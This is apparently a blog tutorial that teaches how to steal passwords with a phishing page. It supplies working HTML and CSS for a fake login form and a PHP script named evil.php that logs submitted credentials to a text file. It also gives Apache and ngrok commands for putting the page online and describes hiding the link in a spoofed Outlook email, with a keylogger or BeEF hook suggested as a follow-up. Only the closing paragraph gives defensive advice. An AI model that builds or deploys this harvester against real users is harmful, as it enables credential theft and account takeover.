How hackers can easily steal your passwords

In this article, you’ll learn how hackers steal passwords using a fake login page. Hackers can steal your password through a variety of methods including password cracking, guessing, physical theft, and phishing.

For this tutorial I will use the phishing method which is a social engineering attack, typically using links to trick people into providing login credentials or other personal information.

So to demonstrate the attack I will create a login page that will steal the username and the password from victims.

HTML Login Page

First, you need a web server to host an HTML page. If you’re using Kali Linux, the Apache web server should be installed by default on the system.

Now change the directory to the Apache web server location.

cd /var/www/html

This is the location where I will put the page files. Next, I will create the login page using nano text editor in the terminal.

nano index.html

Add the following code:

<html>
        <head>
                <meta charset="utf-8">
                <title>Login</title>
                <link rel="stylesheet" href="style.css">
        </head>
        <body>
                <div class="login">
                        <h1>Login Page</h1>
                        <form action="" method="post">
                                <label for="username">

                                </label>
                                <input type="text" name="username" placeholder="Username" id=">
                                <label for="password">

                                </label>
                                <input type="password" name="password" placeholder="Password" >
                                <input type="submit" value="Login">
                        </form>
                </div>
        </body>
</html>

This HTML code creates a login webpage where users can enter their username and password to log in.

The page looks pretty boring, so let’s create a style.css file in the same directory and implement code that will improve the appearance of the form.

nano style.css

Add the following code:

* {
        box-sizing: border-box;
        font-family: Arial;
        font-size: 16px;
}
body {
        background-color: #FAFAFA;
}
.login {
        width: 400px;
        background-color: #ffffff;
        box-shadow: 0 0 9px 0 rgba(0, 0, 0, 0.3);
        margin: 100px auto;
}
.login h1 {
        text-align: center;
        color: #5b6574;
        font-size: 24px;
        padding: 20px 0 20px 0;
        border-bottom: 1px solid #dee0e4;
}
.login form {
        display: flex;
        flex-wrap: wrap;
        justify-content: center;
        padding-top: 20px;
}
.login form label {
        display: flex;
        justify-content: center;
        align-items: center;
        width: 50px;
        height: 50px;
        background-color: #3274d6;
        color: #ffffff;
}
.login form input[type="password"], .login form input[type="text"] {
        width: 310px;
        height: 50px;
        border: 1px solid #dee0e4;
        margin-bottom: 20px;
        padding: 0 15px;
}
.login form input[type="submit"] {
        width: 100%;
        padding: 15px;
        margin-top: 20px;
        background-color: #3274d6;
        border: 0;
        cursor: pointer;
        font-weight: bold;
        color: #ffffff;
        transition: background-color 0.2s;
}

This CSS code styles the login webpage. It defines the appearance, layout, and color of elements. Now if I refresh the index.html page in the web browser, you can see the login page looks much better.

Capture the Login Information

In this step, I will create a PHP script that will be used to capture the login information from the form. I will use nano text editor and the name of the file.

nano evil.php

Add the following code:

<?php $file = 'capture.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND); 
 ?><meta http-equiv="refresh" content="0; url=index.html" />

This code will grab the username and the password from the login form and save it in a text file called ‘capture.txt’.

The “url=http://index.html” is the home page where the user will be redirected after submitting the login information.

You can change the “URL” to a malicious link. This can be another webpage that contains a JavaScript keylogger or Beef hook to gain control over the target browser.

Now you need to modify the index.html file and add the “evil.php” script.

nano index.html

Here, go to form action, and after equal type “evil.php”. Don’t forget to save the file and restart the server using ‘service apache2 restart’ in the terminal.

Also, you need to give permission to access and serve files using the following command.

chown www-data:www-data ./*

This command changes the ownership of all files and directories in the current directory. Make sure you’re in the /var/www/html location before running the command.

At this point, I have a login page that will capture usernames and passwords. The login information will be saved in the “capture.txt” file.

Now to access the login page, type your local IP address or localhost in the browser. So, the page is limited to the local network. To make your page accessible anywhere on the internet, you need to use Ngrok.

Ngrok is an amazing service that exposes local servers to the public internet over secure tunnels. Click here to learn how to install Ngrok.

Once you have Ngrok installed on your system, open a new terminal and type the following command:

ngrok http 80

Here you need to copy the Forwarding link. With this link, you can access the login page from anywhere on the internet. Let’s test the link by pasting it in the Firefox browser.

Here you can see the page is loading properly.

Trick the Victim

In this step, you need to use your social engineering skills and trick the victim to login using the Ngrok link.

Let’s say, for example, I have collected information about the target (emails, phone numbers, names, friends, etc) and I know the target has an Outlook account. So in this case, I can use the following phishing email.

In this email example, select “https://account.live.com” and put the Ngrok forwarding link.

In my case is ‘https://118f-128-127-113-122.ngrok-free.app’.

The link is suspicious, so I’m hiding it inside another link, or you can embed the link into a login button. If the victim clicks on the link, the login page will be prompted to him.

Let’s say he will enter ‘john86@yahoo.com’ for the email and ‘letmein678’ for the password.

Now let’s go back to the Apache web server location (/var/www/html) and open the “capture.txt file using nano.

nano capture.txt

As you can see, I have successfully captured the login information from the victim.

Conclusion

This type of phishing attack can be prevented by hovering and looking at the links in emails to make sure the website URL is valid.

Also, be very suspicious of any emails you receive, if the email contains a link, don’t click on it. Instead of clicking on the link, type in the web address to access the website.